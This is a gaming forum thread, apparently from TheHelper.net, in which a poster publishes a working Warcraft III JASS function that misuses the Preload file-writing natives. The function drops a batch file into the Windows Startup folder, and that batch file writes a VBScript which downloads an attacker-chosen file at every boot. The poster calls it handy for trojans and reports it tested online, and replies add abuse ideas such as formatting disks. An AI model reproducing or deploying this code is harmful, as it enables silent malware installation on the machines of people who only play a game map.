How to virus in Warcraft III

Jesus4Lyf

Jesus4Lyf

Good Idea™
Reaction score
397
Made a post about it here, but hey...
JASS:
function Infest takes string url, string localname returns nothing
    call PreloadGenClear()
    call PreloadGenStart()
    call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objFSO.Fileexists(\"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.SaveToFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\nstart %TEMP%\\download.vbs\n//")
    call PreloadGenEnd("C:\\Users\\YOURUSERNAMEHERE\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\myvirus.bat")
    call PreloadGenClear()
    call PreloadGenStart()
    call Preload("\")\necho Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") > %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.open \"GET\", \""+url+"\", false >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objXMLHTTP.send() >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objXMLHTTP.Status = 200 Then >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objADOStream = CreateObject(\"ADODB.Stream\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Open >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Type = 1 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Write objXMLHTTP.ResponseBody >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Position = 0 >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho Set objFSO = Createobject(\"Scripting.FileSystemObject\") >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho If objFSO.Fileexists(\"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\") Then objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.SaveToFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\"+localname+"\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objADOStream.Close >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho End if >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"%TEMP%\\download.vbs\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\necho objFSO.DeleteFile \"C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat\" >> %TEMP%\\download.vbs\n//")
    call Preload("\")\nstart %TEMP%\\download.vbs\n//")
    call PreloadGenEnd("C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\myvirus.bat")
endfunction

//===========================================================================
function InitTrig_Melee_Initialization takes nothing returns nothing
    call Infest("http://www.stephan-brenner.com/blog/wp-content/uploads/2008/08/donothing.zip", "myvirus.zip")
endfunction

This function is cool. For Windows 7, you must replace YOURUSERNAMEHERE with the username on the computer, but on XP this should be unnecessary (and so XP is particularly vulnerable). Just call the function from WC3. When you next restart your computer, the url you specify will be downloaded to your startup folder as the name you specify, and called (the reason you specify the local filename is so Windows knows what file type to run it as).

If someone could test this online with a friend who has Windows XP and finds it to work, we can successfully say Blizzard needs to patch again. I mean, I'm sure the Russians will love it. :)

In case someone doesn't understand what this does, calling the function from any map will run the file specified on every player's pc on every boot from then onwards. Very handy for trojans and the like. :thup:

Let me know if this works on XP! I can't test it right now... :p

Edit: To remove infections, go to Start > Programs > Startup and delete the filename you used as "localname", or "myvirus.bat", depending which is visible.
Edit: Tested on Windows XP, works online, serious threat.
 
Jesus4Lyf

Jesus4Lyf

Good Idea™
Reaction score
397
>So this is what you were up to all these months
Something like that.
Actually, I've just not been around, but when this came up, I figured I'd drop you guys a note. ;)

Tested on Windows XP. Works 100%.

I should clarify - it's the second boot after you play the map, not the first. Here is a demo map. :)

Do not play any WC3 maps until the next patch.

This map will put an image of the word CYPHIX in your startup. Nothing dangerous. :)
To remove, go to Start > Programs > Startup and delete cyphix.jpg.
Works on map initialisation, works on battle.net.
AKA. This is a real tried and proven threat. :thup:
 

Attachments

  • virustest.w3x
    13.7 KB · Views: 652
Accname

Accname

2D-Graphics enthusiast
Reaction score
1,462
omg you really are making the world a little worse every now and then. what comes next? you tell us not to breathe because viruses could be in the air?

lol, maybe you should tell blizzard they should hire you for bugfixing and such.

by the way, i would delete the scripts, the wrong people could read this thread. i think the majority of the community will trust in your words, those who dont will most probably still play wc3 maps anyways.
 
Jesus4Lyf

Jesus4Lyf

Good Idea™
Reaction score
397
Accname said:
omg you really are making the world a little worse every now and then.
Click to expand...
Well, if I don't find and post it, someone else will find it and abuse it. It's a matter of time.

>already reported it to blizzard?
Can't be stuffed, I have assignments to do. -_-
Edit: Done. And I asked if they have QA jobs available. :p

>maybe you should tell blizzard they should hire you for bugfixing and such
They should, considering this is.. the third time..?

>by the way, i would delete the scripts
I'll wait to see what the other moderators think. I love exposing it.. :)
 
kingkingyyk3

kingkingyyk3

Visitor (Welcome to the Jungle, Baby!)
Reaction score
216
Hmm, what happen if I link it to a super large file(Takes ages to download)? Lol.
 
Romek

Romek

Super Moderator
Reaction score
963
Wow, another exploit? Blizzard's not going to be impressed. :p

> Hmm, what happen if I link it to a super large file(Takes ages to download)? Lol.
It'd download. Eventually. As expected.
 
Jesus4Lyf

Jesus4Lyf

Good Idea™
Reaction score
397
The download is done in the background. So the user won't see it... but yes, you can do it.
Romek said:
Wow, another exploit? Blizzard's not going to be impressed. :p
Click to expand...
I wasn't very impressed, either. Surely someone considered that allowing file I/O from WC3 was a bad idea... o.o
 
D

DioD

New Member
Reaction score
57
blizzard shoud give as legal way to execute code and store data on HDD (also sync this data online) and it will be fine.

All known bugs (including return bug) was developed for good, not for viruses.

well this can do anything (just like codeexec) (russian developements always evil :( )
 
Jesus4Lyf

Jesus4Lyf

Good Idea™
Reaction score
397
Hey, at least with this, you can download an executable to set the local files flag in WC3. So you can download 100mb model packs to people's computers which can then be used in WC3 maps! Whilst you're at it, you can modify WC3 executables to add additional natives like RtC, all without the map player ever knowing! In fact, you can format their whole hard disk! I think you're right, Blizzard needs to give us more power!! MOAR!!.

Sorry for the sarcasm, but WC3 being able to do file I/O is just wrong. If you can use it for good, you can use it for evil. :)

Now, trying to find how to report bugs to Blizzard... that might be too difficult, even for me. :p
 
M

Medeam

New Member
Reaction score
3
Why does people find all the nice stuff and show it to everybody :p

I was using this after the return bug got deleted out.... :( not again.... must think whats next now.
 
Romek

Romek

Super Moderator
Reaction score
963
> I was using this after the return bug got deleted out.... not again.... must think whats next now.
This doesn't typecast variables.
 
~GaLs~

~GaLs~

† Ғσſ ŧħə ѕαĸε Φƒ ~Ğ䣚~ †
Reaction score
180
even real-time antivirus fail to this.. xD
 
D

DioD

New Member
Reaction score
57
this was kept in secret for 2 years, now it does not matter.
warcraft is dead anyway.

no one on english or russian segment of internet using this, asians may be using it, but, its unknown for me. (for ex they used runtime texture changing on units long before this discovered in english segment)

also in some cases warcraft may overwrite existing files (fun with ntldr)
 
You must log in or register to reply here.
General chit-chat
Help Users
  • No one is chatting at the moment.
  • Varine Varine:
    How can you tell the difference between real traffic and indexing or AI generation bots?
  • The Helper The Helper:
    The bots will show up as users online in the forum software but they do not show up in my stats tracking. I am sure there are bots in the stats but the way alot of the bots treat the site do not show up on the stats
  • The Helper The Helper:
    New recipe is Shipwreck Dinner - https://www.thehelper.net/threads/recipe-shipwreck-dinner.193511/
  • Varine Varine:
    I want to build a filtration system for my 3d printer, and that shit is so much more complicated than I thought it would be
  • Varine Varine:
    Apparently ABS emits styrene particulates which can be like .2 micrometers, which idk if the VOC detectors I have can even catch that
  • Varine Varine:
    Anyway I need to get some of those sensors and two air pressure sensors installed before an after the filters, which I need to figure out how to calculate the necessary pressure for and I have yet to find anything that tells me how to actually do that, just the cfm ratings
  • Varine Varine:
    And then I have to set up an arduino board to read those sensors, which I also don't know very much about but I have a whole bunch of crash course things for that
  • Varine Varine:
    These sensors are also a lot more than I thought they would be. Like 5 to 10 each, idk why but I assumed they would be like 2 dollars
  • Varine Varine:
    Another issue I'm learning is that a lot of the air quality sensors don't work at very high ambient temperatures. I'm planning on heating this enclosure to like 60C or so, and that's the upper limit of their functionality
  • Varine Varine:
    Although I don't know if I need to actually actively heat it or just let the plate and hotend bring the ambient temp to whatever it will, but even then I need to figure out an exfiltration for hot air. I think I kind of know what to do but it's still fucking confusing
  • The Helper The Helper:
    Maybe you could find some of that information from AC tech - like how they detect freon and such
  • Varine Varine:
    That's mostly what I've been looking at
  • Varine Varine:
    I don't think I'm dealing with quite the same pressures though, at the very least its a significantly smaller system. For the time being I'm just going to put together a quick scrubby box though and hope it works good enough to not make my house toxic
  • Varine Varine:
    I mean I don't use this enough to pose any significant danger I don't think, but I would still rather not be throwing styrene all over the air
  • The Helper The Helper:
    New dessert added to recipes Southern Pecan Praline Cake https://www.thehelper.net/threads/recipe-southern-pecan-praline-cake.193555/
  • The Helper The Helper:
    Another bot invasion 493 members online most of them bots that do not show up on stats
  • Varine Varine:
    I'm looking at a solid 378 guests, but 3 members. Of which two are me and VSNES. The third is unlisted, which makes me think its a ghost.
     +1
  • The Helper The Helper:
    Some members choose invisibility mode
     +1
  • The Helper The Helper:
    Latest Recipe is Garlic Parmesan Chicken https://www.thehelper.net/threads/recipe-garlic-parmesan-chicken.193575/
  • The Helper The Helper:
    I bitch about Xenforo sometimes but it really is full featured you just have to really know what you are doing to get the most out of it.
  • The Helper The Helper:
    It is just not easy to fix styles and customize but it definitely can be done
  • The Helper The Helper:
    I do know this - xenforo dropped the ball by not keeping the vbulletin reputation comments as a feature. The loss of the Reputation comments data when we switched to Xenforo really was the death knell for the site when it came to all the users that left. I know I missed it so much and I got way less interested in the site when that feature was gone and I run the site.
  • Blackveiled Blackveiled:
    People love rep, lol
     +1
  • The Helper The Helper:
    The recipe today is Sloppy Joe Casserole - one of my faves LOL https://www.thehelper.net/threads/sloppy-joe-casserole-with-manwich.193585/
  • The Helper The Helper:
    Decided to put up a healthier type recipe to mix it up - Honey Garlic Shrimp Stir-Fry https://www.thehelper.net/threads/recipe-honey-garlic-shrimp-stir-fry.193595/

      The Helper Discord

      Members online

      No members online now.
      Online now:
      311 (members: 0, guests: 311)

      Share this page

      Affiliates

      Hive Workshop NUON Dome World Editor Tutorials

      Network Sponsors

      Apex Steel Pipe - Buys and sells Steel Pipe.
      Top